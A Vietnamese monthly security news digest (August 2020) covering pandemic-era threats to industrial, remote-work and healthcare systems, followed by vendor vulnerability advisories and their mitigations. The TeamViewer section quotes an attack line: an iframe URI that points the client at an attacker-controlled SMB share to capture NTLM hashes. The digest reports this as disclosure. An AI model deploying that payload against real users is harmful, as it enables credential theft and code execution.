Tổng hợp tin tức bảo mật tháng 8 (2020)

Phần I. Bản tin nổi bật

Thông qua việc thu thập, tổng hợp các tin tức an toàn thông tin trên toàn thế giới, nhóm thu thập HPT-Secnews đưa ra các tin tức nổi bật như sau:

An toàn không gian mạng dưới sự ảnh hưởng của COVID-19

Tin tặc coi bất kỳ sự kiện lớn nào là cơ hội để phá hoại hoặc thao túng và sự lây lan toàn cầu và COVID-19 là một ví dụ điển hình cho điều này. Rất nhiều tin tặc đã lợi dụng Coronavirus để phát tán các chiến dịch tấn công trên khắp không gian mạng.

1.    Hệ thống kiểm soát công nghiệp có nhiều rủi ro hơn trong thời kỳ coronavirus

Bảy trong số 10 lỗ hổng bảo mật ảnh hưởng đến hệ thống điều khiển công nghiệp (ICS) có thể bị khai thác từ xa, tạo điều kiện cho các chiến dịch APT hoạt động. Nguy cơ càng trở nên trầm trọng hơn do sự phụ thuộc ngày càng nhiều vào việc truy cập từ xa vào các mạng ICS trong bối cảnh đại dịch COVID-19. Các tác nhân như chiến dịch APT đã sử dụng các lỗ hổng có thể khai thác từ xa để phá vỡ các hệ thống quan trọng ở các quốc gia đối thủ.

Cụ thể, hơn 70% lỗ hổng của hệ thống điều khiển công nghiệp (ICS) được tiết lộ trong nửa đầu của năm 2020 có thể bị khai thác và tấn công từ xa, điều đó một lần nữa nhấn mạnh tầm quan trọng của việc bảo vệ các thiết bị ICS sử dụng Internet truy cập từ xa. Theo Báo cáo Rủi ro & Lỗ hổng bảo mật ICS (Biannual ICS Risk & Vulnerability Report) hai năm một lần, được công bố hôm nay bởi Claroty, nhà lãnh đạo toàn cầu về bảo mật công nghệ hoạt động (OT).

Báo cáo bao gồm đánh giá của Nhóm nghiên cứu Claroty về 365 lỗ hổng ICS do Cơ sở dữ liệu về lỗ hổng bảo mật quốc gia (NVD) công bố và 139 cố vấn ICS do Nhóm ứng phó khẩn cấp trên mạng (ICS-CERT) của Hệ thống kiểm soát công nghiệp phát hành trong nửa đầu năm 2020, ảnh hưởng đến 53 nhà cung cấp. Nhóm nghiên cứu Claroty đã phát hiện ra 26 lỗ hổng trong tập dữ liệu này.

So với nửa đầu năm 2019, các lỗ hổng ICS do NVD công bố tăng 10,3% từ 331, trong khi các lỗ hổng công bố bởi CS-CERT tăng 32,4% (105). Hơn 75% lỗ hổng được chỉ định điểm CVSS cao hoặc nghiêm trọng.

Amir Preminger, Phó chủ tịch nghiên cứu tại Claroty cho biết: “Nhận thức được nâng cao về những rủi ro do lỗ hổng ICS gây ra và sự tập trung cao độ giữa các nhà nghiên cứu và nhà cung cấp để xác định và khắc phục những lỗ hổng này một cách hiệu quả và hiệu quả nhất có thể”. “Chúng tôi nhận thấy nhu cầu quan trọng là phải hiểu, đánh giá và báo cáo về toàn cảnh rủi ro và tính dễ bị tổn thương của ICS để mang lại lợi ích cho toàn bộ cộng đồng bảo mật OT. Phát hiện của chúng tôi cho thấy tầm quan trọng của các tổ chức trong việc bảo vệ các kết nối truy cập từ xa và các thiết bị ICS sử dụng internet, và để bảo vệ khỏi lừa đảo, thư rác và ransomware, nhằm giảm thiểu và giảm thiểu tác động tiềm tàng của những mối đe dọa này."

2.    Làm việc tại nhà dẫn đến vi phạm an ninh, chính sách an toàn thông tin

Đại dịch COVID-19 không có dấu hiệu chậm lại nên đối với nhiều doanh nghiệp, nhân viên vẫn đang làm việc từ xa và tại nhà. Một số công ty đang hướng tới việc mở lại không gian văn phòng tiêu chuẩn của họ trong những tháng tới, tuy nhiên việc dịch bệnh bùng phát trở lại khiến họ phải đối mặt với hậu quả của việc chuyển đổi nhanh chóng sang các mô hình làm việc từ xa trong không gian an ninh mạng, ít nhất là với bối cảnh bây giờ và có lẽ là cho đến khi vacine cho covid-19 được bán đại trà.

Để đảm bảo nhân viên có thể làm việc tại nhà, doanh nghiệp cần đảm bảo các thành viên của nhân viên có thiết bị phù hợp cũng như quyền truy cập mạng và tài nguyên công ty.

Tuy nhiên, theo Malwarebytes, các đáp ứng vội vã đối với COVID-19 trong lĩnh vực kinh doanh đã tạo ra lỗ hổng lớn trong an ninh mạng – và do đó, các sự cố bảo mật đã gia tăng.

Malwarebytes đã thực hiện một cuộc khảo sát với 200 chuyên gia CNTT và an ninh mạng cho thấy rằng kể từ khi đại dịch bắt đầu, những người làm việc từ xa đã gây ra vi phạm bảo mật ở 20% tổ chức.

Kết quả là, 24% người trả lời khảo sát nói thêm rằng tổ chức của họ phải trả chi phí không mong muốn để giải quyết các vi phạm an ninh mạng hoặc nhiễm phần mềm độc hại sau khi các lệnh làm việc tại nhà được áp dụng

Tổng cộng, 18% trong số những người được khảo sát cho biết an ninh mạng không phải là ưu tiên và 5% còn đi xa hơn – thừa nhận nhân viên của họ “không biết gì” về các phương pháp bảo mật khi làm việc tại nhà.

Sự xâm phạm email doanh nghiệp, sự chuyển đổi nhanh chóng sang các dịch vụ đám mây – có thể bao gồm các nhóm hoặc kiểm soát truy cập xác định cấu hình không phù hợp – và Mạng riêng ảo (VPN) của công ty được bảo mật không đúng cách đều góp phần làm rò rỉ thông tin, tạo điều kiện cho tin tặc tấn công.

Theo ZDnet

3.    Tác động của COVID-19 đối với an ninh mạng trong hệ thống y tế

Mức độ căng thẳng trong ngành chăm sóc sức khỏe, y tế đang đạt mức tối đa do đại dịch COVID-19, không may thay rủi ro đối với cơ sở hạ tầng an ninh mạng vốn đã mỏng manh của nó đang ở mức cao nay đã đặt ngưỡng cao nhất. Từ các cuộc tấn công mạng gia tăng đến các lỗ hổng trầm trọng hơn cho đến các sai sót gây tốn kém cho máy móc, thiết bị trong ngành y tế, sâu xa hơn là ảnh hưởng về mạng sống con người cho thấy an ninh mạng trong ngành y tế như đang đứng trước một cái xoáy nước không lồ và tất cả mọi người đều đang phải chống chọi với nó.

Không có thời gian để mua một giải pháp tốt hơn

Do quá bận rộn với việc chống lại vi-rút, một số tổ chức chăm sóc sức khỏe đã nhận thấy mình không thể mua các giải pháp bảo mật khác nhau phù hợp hơn với tình hình hiện tại của họ.

Ví dụ, cơ quan Y tế Công cộng Anh (PHE), cơ quan chịu trách nhiệm quản lý đợt bùng phát COVID-19 ở Anh, đã quyết định kéo dài hợp đồng hiện có với nhà cung cấp CNTT chính của họ mà không cho phép các đối thủ cạnh tranh đưa ra lời đề nghị. Họ làm điều này để đảm bảo nhiệm vụ chính của mình, theo dõi dịch bệnh lan rộng, có thể cố gắng làm việc của mình mà không phải lo lắng về việc gián đoạn dịch vụ hoặc các mối quan tâm khác.

Việc gia hạn hợp đồng mà không xem xét đối thủ cạnh tranh không chỉ là một công thức để có được một thỏa thuận kém hiệu quả mà còn có nghĩa là các tổ chức thắng thầu không thể cải thiện những sai sót mà họ có thể đã tìm thấy trong các hệ thống và phần mềm hiện có.

Các cuộc tấn công liên tục nhắm vào các tổ chức chăm sóc sức khỏe

Mặc dù đã có một số lời hứa ban đầu về việc loại bỏ các nhà cung cấp dịch vụ chăm sóc sức khỏe làm mục tiêu sau khi COVID-19 tấn công, tội phạm mạng không thể không làm điều đúng đắn dù chỉ một lần, vẫn có những kẻ liên tục lăm le tấn công vào mảng này. Trên thực tế, chúng tôi đã thấy một số cuộc tấn công phần mềm độc hại nhắm mục tiêu cụ thể vào các tổ chức chăm sóc sức khỏe kể từ khi bắt đầu đại dịch và còn tiếp tục tăng lên sau đó.

Các bệnh viện và các tổ chức chăm sóc sức khỏe khác đã chuyển trọng tâm và nguồn lực sang vai trò chính của họ. Điều này là hoàn toàn dễ hiểu, không có gì quan trọng hơn lúc này là tập trung toàn bộ nguồn lực cho việc ngăn chặn dịch bệnh lây lan. Trong suốt đại dịch COVID-19, ngày càng có nhiều dữ liệu y tế đang được chính phủ và các tổ chức chăm sóc sức khỏe kiểm soát và lưu trữ. Được biết, điều này đã thúc đẩy sự gia tăng các cuộc tấn công mạng có mục tiêu, tinh vi được thiết kế để tận dụng môi trường ngày càng kết nối từ xa.

Trong lĩnh vực chăm sóc sức khỏe, nó cũng dẫn đến sự gia tăng các cuộc tấn công cấp quốc gia, nhằm đánh cắp dữ liệu COVID-19 có giá trị và làm gián đoạn hoạt động chăm sóc. Trên thực tế, lĩnh vực này vừa trở thành mục tiêu vừa là phương thức của các cuộc tấn công kỹ thuật xã hội tiên tiến. Những kẻ tấn công lợi dụng đại dịch đã thực hiện một loạt các chiến dịch lừa đảo sử dụng COVID-19 như một chiêu dụ để thả phần mềm độc hại hoặc ransomware.

COVID-19 không chỉ đặt các tổ chức chăm sóc sức khỏe vào tình trạng nguy hiểm trực tiếp của các cuộc tấn công mạng mà một số tổ chức đã trở thành nạn nhân của thiệt hại tài sản thế chấp. Ví dụ: có các cuộc tấn công xâm nhập email doanh nghiệp (BEC) theo chủ đề COVID-19 có thể nhằm vào các mục tiêu từ ngân hàng tới các trụ sở y tế. Mục đích thì ai cũng đoán được, đó là dữ liệu y tế, kinh doanh, dữ liệu chính phủ và tống tiền.

Sự cần thiết của người bảo vệ an ninh mạng

Các hoạt động bảo vệ ngành y tế được hoan nghênh và yêu cầu, các tập luật về an ninh mang dù đã được tung ra bởi chính phủ, tuy nhiên nó không thực sự hữu hiệu khi tội phạm mạng sử dụng các phương pháp tấn công ngày càng tinh vi. Do vậy các hệ thống y tế cần được bảo vệ mọi lúc, cần phải có các biện pháp, giải pháp bổ sung để chống lại các cuộc tấn công “COVID” toàn cầu này.

Phần II. Tổng hợp thông tin lỗ hổng bảo mật

Một số lỗ hổng bảo mật đáng chú ý.

1.    Hàng loạt lỗ hổng bảo mật trong hệ thống điều khiển y tế được công bố

Các lỗ hổng bao gồm:

ICSMA-20-233-01

Mô tả: Các thiết bị y tế Suresigns VS4 của philips bị ảnh hưởng bởi một lỗ hổng mức cao

Mức độ: Cao

Việc khai thác thành công các lỗ hổng này có thể cho phép kẻ tấn công truy cập vào các kiểm soát quản trị và cấu hình hệ thống, điều này có thể cho phép thay đổi các mục cấu hình hệ thống khiến dữ liệu bệnh nhân được gửi đến một điểm đến từ xa.

Phạm vi ảnh hưởng: Philips SureSigns VS4 A.07.107 và các phiên bản trước đó.

Cách thức giảm thiểu rủi ro:

  • Để giảm thiểu những lỗ hổng này, Philips khuyến nghị người dùng thay đổi tất cả mật khẩu hệ thống trên SureSigns VS4 bằng mật khẩu duy nhất cho từng thiết bị và bảo mật thiết bị khi không sử dụng để ngăn chặn truy cập trái phép, như đã tham khảo trong Hướng dẫn cài đặt và cấu hình có sẵn trên Incenter. Philips cũng khuyến nghị người dùng nên cân nhắc thay thế thiết bị SureSigns VS4 bằng công nghệ mới hơn.
  • Người dùng có câu hỏi liên quan đến các tùy chọn cài đặt và nâng cấp màn hình bệnh nhân SureSigns VS4 cụ thể nên liên hệ với bộ phận hỗ trợ dịch vụ của Philips hoặc bộ phận hỗ trợ dịch vụ khu vực hoặc gọi 1-800-722-9377.
  • Bổ sung các biện pháp giảm thiểu rủi ro:
    • Thực hiện các biện pháp bảo mật vật lý để hạn chế hoặc kiểm soát quyền truy cập vào các hệ thống quan trọng.
    • Chỉ cấp quyền truy cập hệ thống đối với những người được ủy quyền và tuân theo cách tiếp cận ít đặc quyền nhất.
    • Áp dụng các chiến lược chuyên sâu về phòng thủ an ninh mạng.
    • Vô hiệu hóa các tài khoản và dịch vụ không cần thiết.

ICSA-20-168-01

Mô tả: Việc xử lý không đúng cách, không nhất quán của tham số độ dài trong thành phần IPv4 / UDP của thiết bị Treck khi xử lý gói tin được gửi bởi kẻ tấn công mạng trái phép. Lỗ hổng này có thể dẫn đến việc thực thi mã từ xa.

Mức độ: Nghiêm trọng

Việc khai thác thành công các lỗ hổng này có thể cho phép thực thi mã từ xa và đánh cắp thông tin nhạy cảm.

Phạm vi ảnh hưởng:

Giao thức TCP / IP trên thiết bị Treck bị ảnh hưởng bao gồm:

IPv4/ IPv6/ UDP/ DNS/ DHCP /TCP /ICMPv4 /ARP

Cách thức giảm thiểu rủi ro:

Người dùng áp dụng phiên bản mới nhất của các sản phẩm bị ảnh hưởng (Treck TCP / IP 6.0.1.67 hoặc các phiên bản mới hơn). Để nhận các bản vá, hãy gửi email tới security@treck.com.

ICSA-19-253-03

Mô tả: Kernel của thiết bị có thể bị buộc phải thực hiện các gói tin call cực kì lớn cho mọi gói tin TCP Selective Acknowledgement (SACK) TCP gửi đến, điều này có thể dẫn đến tình trạng từ chối dịch vụ (DOS)

Mức độ: Cao

Việc khai thác thành công các lỗ hổng này có thể gây ra tình trạng từ chối dịch vụ.

Phạm vi ảnh hưởng:

Các thiết bị của Siemens industrial:

  • SIMATIC CM 1542-1: All versions
  • SIMATIC NET CP 1242-7: All versions prior to 3.2
  • SIMATIC NET CP 1243-1 (incl. SIPLUS NET variants): All versions prior to 3.2
  • SIMATIC NET CP 1243-7 LTE EU: All versions prior to 3.2
  • SIMATIC NET CP 1243-7 LTE US: All versions prior to 3.2
  • SIMATIC NET CP 1243-8 IRC: All versions prior to 3.2
  • SIMATIC NET CP 1542SP-1: All versions prior to 2.1
  • SIMATIC NET CP 1542SP-1 IRC (incl. SIPLUS NET variants): All versions prior to 2.1
  • SIMATIC NET CP 1543-1 (incl. SIPLUS NET variants): All versions prior to 2.2
  • SIMATIC NET CP 1543SP-1 (incl. SIPLUS NET variants): All versions prior to 2.1
  • SIMATIC NET CP 1623: All versions: All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 1628: All versions: All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 343-1 Advanced (incl. SIPLUS NET variants): All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 442-1 RNA: All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 443-1 (incl. SIPLUS NET variants): All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 443-1 Advanced (incl. SIPLUS NET variants): All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 443-1 OPC UA: All versions (only affected by CVE-2019-8460)
  • SIMATIC NET CP 443-1 RNA: All versions (only affected by CVE-2019-8460)
  • RUGGEDCOM APE 1404 Linux: All versions prior to Debian 9 Linux Image 2019-12-13 (only affected by CVE-2019-11479)
  • RUGGEDCOM RX 1400 VPE Debian Linux: All versions prior to Debian 9 Linux Image 2019-12-13 (only affected by CVE-2019-11479)
  • RUGGEDCOM RX 1400 VPE Linux CloudConnect: All versions prior to Debian 9 Linux Image 2019-12-13 13 (only affected by CVE-2019-11479) 
  • SCALANCE W1700: All versions prior to 2.0
  • TIM 1531 IRC (incl. SIPLUS NET variants): All versions prior to 2.1
  • CloudConnect 712: All versions prior to 1.1.5
  • ROX II: All versions prior to 2.13.3 (Only vulnerable to CVE-2019-11479)
  • RUGGEDCOM RM1224: All versions prior to 6.2
  • SCALANCE M800: All versions prior to 6.2
  • SCALANCE S615: All versions prior to 6.2
  • SINEMA Remote Connect Server: All versions prior to 2.1
  • SIMATIC CP 1623: All versions
  • SIMATIC CP 1628: All versions
  • SIMATIC MV500: All versions
  • SCALANCE M875: All versions
  • SCALANCE SC-600: All versions prior to 2.0.1
  • SCALANCE W-700 (IEEE 802.11n): All versions prior to 6.4
  • SCALANCE W1700: All versions
  • SCALANCE WLC711: All versions
  • SCALANCE WLC712: All versions
  • SIMATIC ITC1500: All versions
  • SIMATIC ITC1500 PRO: All versions
  • SIMATIC ITC1900: All versions
  • SIMATIC ITC1900 PRO: All versions
  • SIMATIC ITC2200: All versions
  • SIMATIC ITC2200 PRO: All versions
  • SIMATIC MV500: All versions prior to 1.2
  • SIMATIC RF185C: All versions
  • SIMATIC RF186C: All versions
  • SIMATIC RF186CI: All versions
  • SIMATIC RF188C: All versions
  • SIMATIC RF188CI: All versions
  • SIMATIC RF600R: All versions
  • SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (incl. SIPLUS variant): All versions
  • SIMATIC Teleserver Adapter IE Advanced: All versions
  • SIMATIC Teleserver Adapter IE Basic: All versions
  • SINEMA Remote Connect Server: All versions prior to 2.0 SP1
  • SINUMERIK 808D: All versions prior to 4.92
  • SINUMERIK 828D: All versions prior to 4.8 SP5
  • SINUMERIK 840D sl: All versions prior to 4.8 SP5
  • TIM 1531 IRC (incl. SIPLUS variant): All versions


Cách thức giảm thiểu rủi ro:

Siemens khuyến nghị người dùng làm theo các cách giải quyết và giảm thiểu cụ thể dưới đây. Siemens cũng đã phát hành các bản sửa lỗi cho các sản phẩm sau:

CloudConnect 712: Cập nhật lên v1.1.5

ROX II: Cập nhật lên v2.13.3 (còn tồn tại CVE-2019-11479)

SCALANCE M875: Nâng cấp phần cứng lên SCALANCE M876-4 hoặc RUGGEDCOM RM1224 và áp dụng các bản vá nếu có

SCALANCE SC-600: Cập nhật lên v2.0.1

SCALANCE W700 (IEEE 802.11n): Cập nhật lên v6.4 hoặc mới hơn

SCALANCE W1700: Cập nhật lên v2.0 trở lên

SIMATIC NET CP 1242-7: Cập nhật lên v3.2 trở lên

SIMATIC NET CP 1243-1 (bao gồm các biến thể SIPLUS NET): Cập nhật lên v3.2 trở lên

SIMATIC NET CP 1243-7 LTE EU: Cập nhật lên v3.2 trở lên

SIMATIC NET CP 1243-7 LTE US: Cập nhật lên v3.2 trở lên

SIMATIC NET CP 1243-8 IRC: Cập nhật lên v3.2 trở lên

SIMATIC NET CP 1542SP-1: Cập nhật lên v2.1 trở lên

SIMATIC NET CP 1542SP-1 IRC (bao gồm các biến thể SIPLUS NET): Cập nhật lên v2.1 trở lên

SIMATIC NET CP 1543-1 (bao gồm các biến thể SIPLUS NET): Cập nhật lên v2.2 trở lên

SIMATIC NET CP 1543SP-1 (bao gồm các biến thể SIPLUS NET): Cập nhật lên v2.1 trở lên

RUGGEDCOM APE 1404 Linux: Áp dụng các bản vá lỗi Debian mới nhất hiện có

RUGGEDCOM RX 1400 VPE Debian Linux: Áp dụng các bản vá Debian mới nhất hiện có trong VPE

RUGGEDCOM RX 1400 VPE Linux CloudConnect: Áp dụng các bản vá lỗi Debian mới nhất có sẵn trong VPE hoặc áp dụng hình ảnh CloudConnect VPE Linux mới nhất

TIM 1531 IRC (bao gồm các biến thể SIPLUS NET): Cập nhật lên v2.1 trở lên

RUGGEDCOM RM1224: Cập nhật lên v6.2 trở lên

SCALANCE M800: Cập nhật lên v6.2 trở lên

SCALANCE S615: Cập nhật lên v6.2 trở lên

SIMATIC MV500: Áp dụng các biện pháp giảm thiểu thủ công bên dưới

Máy chủ kết nối từ xa SINEMA: Cập nhật lên v2.1

SINUMERIK 808D: Cập nhật lên v4.92. Bản cập nhật có thể được lấy từ đại diện của Siemens hoặc thông qua dịch vụ khách hàng của Siemens.

SINUMERIK 828D / 840D sl: Cập nhật lên v4.8 SP5. Bản cập nhật có thể được lấy từ đại diện của Siemens hoặc thông qua dịch vụ khách hàng của Siemens.

Các biện pháp phòng thủ tối thiểu:

  • Hạn chế quyền truy cập mạng đối với các thiết bị bị ảnh hưởng
  • Áp dụng các giải pháp, biện pháp chuyên sâu về phòng thủ

Và nhiều lỗ hổng ICS khác:

  • ICSA-20-224-02: Schneider Electric APC Easy UPS On-Line
  • ICSA-20-224-03: Tridium Niagara
  • ICSA-20-224-04: Siemens SCALANCE, RUGGEDCOM
  • ICSA-20-224-05: Siemens SIMATIC, SIMOTICS
  • ICSA-20-224-06: Siemens Desigo CC
  • ICSA-20-224-07: Siemens Automation License Manager
  • ICSA-20-224-08: Siemens SICAM A8000 RTUs
  • ICSA-20-196-05: Siemens UMC Stack (Update A)
  • ICSA-20-196-07: Siemens Opcenter Execution Core (Update A)
  • ICSA-20-161-04: Siemens SIMATIC, SINAMICS, SINEC, SINEMA, SINUMERIK (Update B)
  • ICSA-20-105-07: Siemens SCALANCE & SIMATIC (Update A)
  • ICSA-20-042-02: Siemens Industrial Products SNMP Vulnerabilities (Update B)
  • ICSA-20-042-04: Siemens PROFINET-IO Stack (Update B)
  • ICSA-20-042-10: Siemens SCALANCE S-600 (Update A)
  • ICSA-19-283-01: Siemens Industrial Real-Time (IRT) Devices (Update D)
  • ICSA-19-283-02: Siemens PROFINET Devices (Update G)
  • ICSA-19-253-03: Siemens Industrial Products (Update H)
  • ICSA-19-099-06: Siemens SIMATIC, SIMOCODE, SINAMICS, SITOP, and TIM (Update I)
  • ICSA-17-339-01: Siemens Industrial Products (Update P)
  • ICSA-17-243-01: Siemens OPC UA Protocol Stack Discovery Service (Update D)
  • ICSA-17-129-02: Siemens PROFINET DCP (Update R)
  • ICSA-20-219-01: Trailer Power Line Communications

Nguồn: NVD Vulnerability

2.    VMware: Các lỗi nghiêm trọng cao ảnh hưởng đến các sản phẩm VMware Workstation, Fusion và vSphere

Mô tả: Các lỗ hổng có mức độ nghiêm trọng cao ảnh hưởng đến nhiều sản phẩm, việc khai thác cho phép kẻ tấn công lấy được thông tin nhạy cảm trên hệ thống VMware

CVE-2020-3960

Lỗ hổng out-of-bounds ảnh hưởng đến VMware ESXi, Workstation và Fusion, người dùng được khuyến nghị cập nhật với các phiên bản cố định.

Kẻ tấn công có quyền truy cập tuy không phải quản trị cục bộ vẫn có thể vào một máy ảo và đọc thông tin đặc quyền có trong bộ nhớ.

CVE-2020-3961

Một lỗ hổng leo thang đặc quyền tồn tại với VMware Horizon Client cho Windows do cấu hình quyền thư mục và tải thư viện không an toàn.

Lỗ hổng có thể bị khai thác bởi người dùng cục bộ trên hệ thống và họ có thể chạy lệnh như bất kỳ người dùng nào.

Lỗ hổng ảnh hưởng đến Horizon Client dành cho Windows 5.x và trước đó, đã được khắc phục với phiên bản 5.4.3, lỗ hổng được coi là phạm vi nghiêm trọng quan trọng và điểm cơ bản CVSSv3 là 8,4.

CVE-2020-3956

Một lỗ hổng chèn mã với VMware Cloud Director dẫn đến việc thực thi mã từ xa tùy ý. Lỗ hổng có thể bị khai thác bởi các tác nhân đe dọa bằng cách gửi lưu lượng độc hại đến VMware Cloud Director.

Lỗ hổng này có thể bị khai thác thông qua giao diện người dùng dựa trên HTML5 và Flex, giao diện API Explorer và quyền truy cập API.

Tình trạng: VMware đã xuất bản bản vá khắc phục

Nguồn: GbHackers

3.    Lỗ hổng CVE-2020-3452 trong Cisco ASA & FTD


Mô tả:
Xuất hiện lỗ hổng bảo mật qua đường dẫn có mức độ nghiêm trọng cao CVE-2020-3452 qua Cisco Adaptive Security Appliance (ASA) và Cisco FirePower Threat Defense (FTD).

Lỗ hổng cho phép kẻ tấn công từ xa thực hiện một cuộc tấn công truyền qua thư mục cho phép kẻ tấn công đọc các tệp nhạy cảm trên một hệ thống mục tiêu.

Lỗ hổng này tồn tại là do thiếu xác thực đầu vào của các URL trong các yêu cầu HTTP, kẻ tấn công có thể khai thác lỗ hổng này bằng cách gửi một yêu cầu HTTP được tạo thủ công có chứa các chuỗi ký tự truyền tải thư mục.

Rapid7 Labs cho biết rằng “chỉ có khoảng 10% thiết bị Cisco ASA / FTD được khởi động lại kể từ khi phát hành bản vá. Điều đó nói lên rằng chỉ 27 trong số 398 công ty được phát hiện đã được vá / khởi động lại. Hãy kiểm tra hệ thống Cisco ASA / FTD trong doanh nghiệp của bạn đã được vá lỗ hổng này chưa.

Tình trạng: Đã khắc phục qua cập nhật bản vá

Nguồn: GBHackers

4.    Lỗ hổng TeamViewer CVE-2020-13699 bị khai thác thành công: bẻ khóa mật khẩu của người dùng

Một lỗ hổng có mức độ cao (CVE-2020-13699) trong TeamViewer dành cho Windows có thể bị kẻ tấn công từ xa khai thác để bẻ khóa mật khẩu của người dùng và do đó dẫn đến việc khai thác hệ thống và tất nhiên sau đó kẻ tấn công có thể cài cắm bất cứ thứ gì lên máy tính nạn nhân.

Mô tả: CVE-2020-13699 là điểm yếu bảo mật phát sinh từ phần tử hoặc đường dẫn tìm kiếm không được trích dẫn – cụ thể hơn, đó là do ứng dụng không trích dẫn chính xác các trình xử lý URI tùy chỉnh của nó – và có thể bị khai thác khi hệ thống có cài đặt phiên bản TeamViewer dễ bị tấn công trang web thủ công độc hại.

“Kẻ tấn công có thể nhúng iframe độc hại vào một trang web có URL được tạo thủ công (iframe src = ‘teamviewer10: –play \\ attacker-IP \ share \ fake.tvs’) sẽ khởi chạy ứng dụng khách TeamViewer Windows trên máy tính để bàn và buộc nó phải mở một chia sẻ SMB từ xa” theo Jeffrey Hofmann, một kỹ sư bảo mật của Praetorian, người đã phát hiện và tiết lộ lỗ hổng.

“Windows sẽ thực hiện xác thực NTLM khi mở chia sẻ SMB và yêu cầu đó có thể được chuyển tiếp (sử dụng một công cụ như trình phản hồi) để thực thi mã (hoặc bắt để bẻ khóa hàm băm).”

Như đã nói trước đây, việc khai thác lỗ hổng có thể được bắt đầu từ xa và không cần xác thực trước đó. Lỗ hổng có vẻ lý tưởng cho các cuộc tấn công lỗ tưới có chủ đích.

Không có dấu hiệu nào cho thấy lỗ hổng này đang bị khai thác trong không gian mạng và hiện không có hoạt động khai thác công khai nào.

CIS đánh giá rằng lỗ hổng này sẽ được sử dụng trong các cuộc tấn công có chủ đích(APT) vào các tổ chức chính phủ và doanh nghiệp lớn và vừa, trung bình đối với các tổ chức chính phủ và doanh nghiệp nhỏ và thấp đối với người dùng gia đình.

Phạm vi ảnh hưởng: Theo công ty, lỗ hổng này ảnh hưởng đến TeamViewer phiên bản 8 đến 15 (lên đến 15.8.2) cho nền tảng Windows. Người dùng nên nâng cấp lên phiên bản 15.8.3 để đóng lỗ hổng.

Và một số lỗ hổng khác.

Phần III. Thông tin tổng hợp security hotnews

Bảng tổng hợp thông tin security hotnews khác từ nhiều nguồn.